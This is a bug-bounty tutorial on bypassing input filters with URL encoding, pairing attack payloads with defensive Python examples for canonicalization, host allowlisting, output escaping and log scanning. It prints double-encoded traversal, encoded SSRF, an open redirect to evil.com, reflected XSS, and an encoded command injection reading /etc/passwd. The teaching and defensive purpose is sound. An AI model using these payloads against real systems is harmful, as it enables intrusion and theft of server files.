This Simple URL Encoding Made me $50,000 in Bounties


URL encoding, also known as percent-encoding, is a technique used to encode special characters in URLs to ensure safe transmission over the internet. This method replaces unsafe ASCII characters with a “%” followed by two hexadecimal digits. Attackers and bug bounty hunters often manipulate URL encoding to bypass security filters, leading to critical vulnerabilities like SSRF, XSS, and open redirects.

You Should Know:

1. Common URL Encoding Techniques

  • Space: `%20`
  • Double quote ("): `%22`
  • Single quote ('): `%27`
  • Less than (<): `%3C`
  • Greater than (>): `%3E`
  • Forward slash (/): `%2F`
  • Backslash (\): `%5C`

2. Using URL Encoding in Bug Bounty Hunting

Many web applications validate a URL before it has been fully decoded, so the check sees one string and the component that later processes the request sees another. That mismatch is what leads to vulnerabilities.

Example: Bypassing Filters with Double Encoding

Suppose a filter blocks `../` to prevent directory traversal. You can bypass it using:

`%252E%252E%252F` (double-encoded `../`: one decode yields `%2E%2E%2F`, a second yields `../`)

Example: SSRF via URL Encoding

A vulnerable endpoint might accept:

http://internal-server/admin

But if filtered, try:

http://%69%6E%74%65%72%6E%61%6C%2D%73%65%72%76%65%72/admin

(Hex-encoded “internal-server”)
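The defensive counterpart of the double-encoding trick is to canonicalize before checking. The following is an added example written for this page, not code from the original post: it shows the naive literal `../` filter the text describes, a bounded repeated percent-decoder, and a path resolver that judges the canonical form against a base directory. The base directory `/var/www/html` and the request paths are constructed inputs.

```python
from __future__ import annotations

import posixpath
from urllib.parse import unquote


def naive_filter_blocks(raw: str) -> bool:
    """The kind of check the section above describes: it looks for a literal
    '../' in the request as received, before any decoding."""
    return "../" in raw


def canonicalize(value: str, max_rounds: int = 3) -> tuple[str, int]:
    """Percent-decode until the string stops changing, at most max_rounds times.

    Returns (stable_value, rounds_that_changed_it). A count above 1 means the
    input arrived with nested encoding, which legitimate clients rarely send.
    """
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def resolve_under(base_dir: str, raw_path: str) -> str | None:
    """Map a request path to a filesystem path, or None if it escapes base_dir.

    base_dir is an absolute directory below the filesystem root (constructed
    value in the demo). The check runs on the canonical form, so encoded,
    double-encoded and backslash variants of '..' are judged the same way as a
    plain '../'.
    """
    decoded, _ = canonicalize(raw_path)
    decoded = decoded.replace("\\", "/")  # IIS-style separators count too
    base = base_dir.rstrip("/")
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # Constructed request paths: the double-encoded traversal from the section
    # above, plus a benign one.
    for raw in ("%252E%252E%252Fetc/passwd", "images/logo.png"):
        print(raw,
              "| naive filter blocks:", naive_filter_blocks(raw),
              "| canonical:", canonicalize(raw),
              "| resolves to:", resolve_under("/var/www/html", raw))
```

Running it shows the naive filter passing `%252E%252E%252Fetc/passwd` untouched while `resolve_under` rejects it, because after two decode rounds the path climbs out of `/var/www/html`. The round cap matters: an unbounded decode loop is itself a denial-of-service vector and also makes the application's view of the input unpredictable.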

3. Testing for Open Redirects

Some sites check if a URL starts with `https://trusted.com`. Bypass with:

https://trusted.com%2F%3Fnext%3Dhttps://evil.com
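Both the SSRF filter in section 2 and the redirect check above fail for the same reason: they compare raw text instead of the parsed host. The block below is an added example for this page (not code from the original post) that parses the URL with `urllib.parse.urlsplit`, refuses any host containing characters a hostname cannot have, and then consults an allowlist. `ALLOWED_HOSTS`, the partner host `api.partner.example` and the function names are assumptions made for the demo.

```python
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Constructed allowlist for this example; a real deployment keeps it in config.
ALLOWED_HOSTS = frozenset({"trusted.com", "www.trusted.com"})

# A hostname is dot-joined labels of letters, digits and '-'. '%' can never
# appear, so a percent-encoded host is rejected outright rather than decoded
# and compared.
HOST_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)"
    r"(?:\.(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?))*$"
)


def naive_redirect_check(url: str) -> bool:
    """The prefix test the section above describes; it operates on raw text."""
    return url.startswith("https://trusted.com")


def url_host_allowed(url: str, allowed_hosts=ALLOWED_HOSTS,
                     schemes=("https",)) -> bool:
    """Accept url only if it parses to an allowed scheme and an allowlisted host.

    urlsplit ends the authority at the first literal '/', '?' or '#', so
    percent-encoded stand-ins for those characters stay inside the host string
    and make it fail HOST_RE. The same function serves an SSRF allowlist when
    called with schemes=("http", "https").
    """
    try:
        parts = urlsplit(url)
    except ValueError:          # e.g. malformed IPv6 brackets
        return False
    if parts.scheme not in schemes:
        return False
    host = parts.hostname or ""  # urlsplit already lower-cases it
    if not HOST_RE.match(host):
        return False
    return host in allowed_hosts


if __name__ == "__main__":
    # Constructed inputs: the redirect payload from the section above, a
    # legitimate same-site target, and the encoded-host URL from section 2.
    redirect_payload = "https://trusted.com%2F%3Fnext%3Dhttps://evil.com"
    print("naive check accepts payload:", naive_redirect_check(redirect_payload))
    print("host allowlist accepts payload:", url_host_allowed(redirect_payload))
    print("host allowlist accepts /account:",
          url_host_allowed("https://trusted.com/account?next=/home"))
    print("SSRF allowlist accepts encoded host:",
          url_host_allowed("http://%69%6E%74%65%72%6E%61%6C%2D%73%65%72%76%65%72/admin",
                           {"api.partner.example"}, schemes=("http", "https")))
```

For outbound requests the host allowlist is necessary but not sufficient on its own: the name still has to resolve, and a production SSRF guard additionally checks the resolved addresses against private ranges. That step is deliberately left out here to keep the example focused on the parsing point.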

4. XSS via Improper URL Decoding

If a reflected parameter is inserted into JavaScript without proper sanitization:

https://example.com/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E

5. Command Injection in Linux/Windows

URL-encoded payloads can execute commands if processed unsafely:

Linux Command Injection

curl "http://victim.com/api?cmd=%63%61%74%20%2F%65%74%63%2F%70%61%73%73%77%64"

(Decodes to `cat /etc/passwd`)

Windows Command Injection

ping%20%2Dn%201%20127.0.0.1

(Decodes to `ping -n 1 127.0.0.1`)
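Sections 4 and 5 share one fix on the server side: decode once, then encode for the context the value lands in, and never hand a decoded string to a shell. The block below is an added example written for this page, not code from the original post. `render_html`, `render_js_literal` and `ping_argv` are names chosen for the demo; the reflected value is the decoded `q` parameter from section 4 and the rejected host value is the decoded `cmd` payload from section 5.

```python
from __future__ import annotations

import html
import json
import re
import subprocess
import sys
from urllib.parse import unquote

# Constructed reflected value: what the application sees after one URL decode
# of the search request in section 4.
REFLECTED = unquote("%3Cscript%3Ealert(1)%3C%2Fscript%3E")


def render_html(query: str) -> str:
    """Place a user value into an HTML text node: entity-encode it first."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_js_literal(query: str) -> str:
    """Place a user value into an inline script as a JS string literal.

    json.dumps yields a valid JS string but leaves '<' and '>' alone, so a
    value containing '</script>' would still terminate the script element.
    Escaping the angle brackets as \\u003c / \\u003e closes that gap.
    """
    literal = json.dumps(query).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<script>var q = {literal};</script>"


# Strict character allowlist for a host argument; anything else is refused.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def ping_argv(host: str) -> list[str]:
    """Build the argv for a single ping, never a shell command string.

    The host must match HOST_RE, so a decoded value such as 'cat /etc/passwd'
    is rejected before any process starts. Because the result is a list, the
    OS receives each element as one argument and no shell ever parses it.
    """
    if not HOST_RE.match(host):
        raise ValueError(f"rejected host value: {host!r}")
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    return ["ping", count_flag, "1", host]


def run_ping(host: str) -> int:
    # shell=False is subprocess's default; keep it that way.
    return subprocess.run(ping_argv(host), check=False,
                          capture_output=True).returncode


if __name__ == "__main__":
    print(render_html(REFLECTED))
    print(render_js_literal(REFLECTED))
    print(ping_argv("127.0.0.1"))
    try:
        ping_argv(unquote("%63%61%74%20%2F%65%74%63%2F%70%61%73%73%77%64"))
    except ValueError as exc:
        print("refused:", exc)
```

The JavaScript case is the one most often got wrong: `json.dumps` alone is enough for a JSON response, but inside a `<script>` element the HTML parser runs first and stops at the first `</script>` regardless of JavaScript string quoting, which is why the `<` is escaped as well.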

6. Automating URL Encoding with Python

```python
import urllib.parse

payload = "<script>alert(1)</script>"
# quote() leaves "/" unencoded by default; safe="" encodes it too,
# which is what produces the %2F shown in the output below.
encoded_payload = urllib.parse.quote(payload, safe="")
print(encoded_payload)  # Output: %3Cscript%3Ealert%281%29%3C%2Fscript%3E
```

7. Decoding URLs for Analysis

Use `echo` and `xxd` in a Linux shell (`xxd -r -p` skips the `%` characters and reverses the remaining hex pairs):

```bash
echo "%68%65%6C%6C%6F" | xxd -r -p  # Output: hello
```
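Decoding one value by hand is fine for a single request; for log review the same decoding has to be applied to every parameter and turned into signals. The block below is an added example for this page, not code from the original post: it walks constructed Common Log Format lines that reuse the encoded parameters shown earlier, decodes each query parameter, and flags four things a reviewer cares about: nested encoding, markup after decoding, a `..` path segment after decoding, and percent-encoding of letters or digits that never needed encoding. The log lines, the regexes and the finding names are all this example's own.

```python
from __future__ import annotations

import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (Common Log Format). Request targets reuse the
# encoded parameters shown earlier on this page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2025:12:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512
10.0.0.9 - - [10/Mar/2025:12:00:02 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 318
10.0.0.9 - - [10/Mar/2025:12:00:03 +0000] "GET /download?file=%252E%252E%252Fetc%252Fpasswd HTTP/1.1" 404 0
10.0.0.9 - - [10/Mar/2025:12:00:04 +0000] "GET /api?cmd=%63%61%74%20%2F%65%74%63%2F%70%61%73%73%77%64 HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Percent-encoded digits and letters (%30-%39, %41-%5A, %61-%7A). These never
# need encoding, so a run of them usually means a plain word is being hidden
# from a text filter, as with the encoded host and cmd values on this page.
UNRESERVED_ENCODED_RE = re.compile(r"%(?:3[0-9]|[46][1-9a-f]|[57][0-9a])", re.IGNORECASE)


def decode_fully(value: str, limit: int = 4) -> tuple[str, int]:
    """Decode a once-decoded value until stable; return (text, extra_rounds).

    extra_rounds > 0 means the client sent more than one layer of encoding.
    """
    extra = 0
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value, extra = decoded, extra + 1
    return value, extra


def analyze_query(target: str) -> list[tuple[str, list[str]]]:
    """Return (param_name, findings) for each query parameter with findings."""
    query = urlsplit(target).query
    results = []
    for raw_pair in query.split("&"):
        if not raw_pair:
            continue
        raw_name, _, raw_value = raw_pair.partition("=")
        name = unquote(raw_name)
        once = unquote(raw_value.replace("+", " "))  # the app's view after one decode
        final, extra = decode_fully(once)
        findings = []
        if extra:
            findings.append("nested-encoding")
        if "<" in final or ">" in final:
            findings.append("markup")
        if ".." in final.replace("\\", "/").split("/"):
            findings.append("traversal")
        if UNRESERVED_ENCODED_RE.search(raw_value):
            findings.append("unreserved-encoded")
        if findings:
            results.append((name, findings))
    return results


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (path, param, findings) for every flagged parameter in the log."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        for name, findings in analyze_query(target):
            hits.append((urlsplit(target).path, name, findings))
    return hits


if __name__ == "__main__":
    for path, name, findings in scan_log(SAMPLE_LOG):
        print(f"{path} param={name}: {', '.join(findings)}")
```

The "unreserved-encoded" signal is cheap and has a low false-positive rate, because browsers and well-behaved clients never encode `a`-`z`, `A`-`Z` or `0`-`9`; the nested-encoding signal is what catches the `%252E` style from section 2 even when the final decoded value looks harmless.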

8. Browser DevTools for Manual Testing

  • Chrome/Firefox: use `decodeURIComponent()` in the console:
    `decodeURIComponent("%3Cscript%3E"); // Output: <script>`

9. OWASP Cheat Sheet Reference

For advanced techniques, refer to:

[OWASP URL Encoding](https://owasp.org/www-community/attacks/URL_Encoding)

What Undercode Say

URL encoding is a powerful tool for both developers and hackers. While it ensures data integrity in web requests, improper handling can lead to severe security flaws. Always:
– Validate and sanitize inputs.
– Decode input completely (a bounded number of times) before validating it, so the check sees the same value the application later uses.
– Test for double encoding in bug bounty programs.

For penetration testers, mastering encoding techniques is crucial for uncovering hidden vulnerabilities.


References:

Reported By: [Nahamsec This](https://www.linkedin.com/posts/nahamsec_this-simple-url-encoding-made-me-50000-activity-7309956699941998592-gQ7G) – Hackers Feeds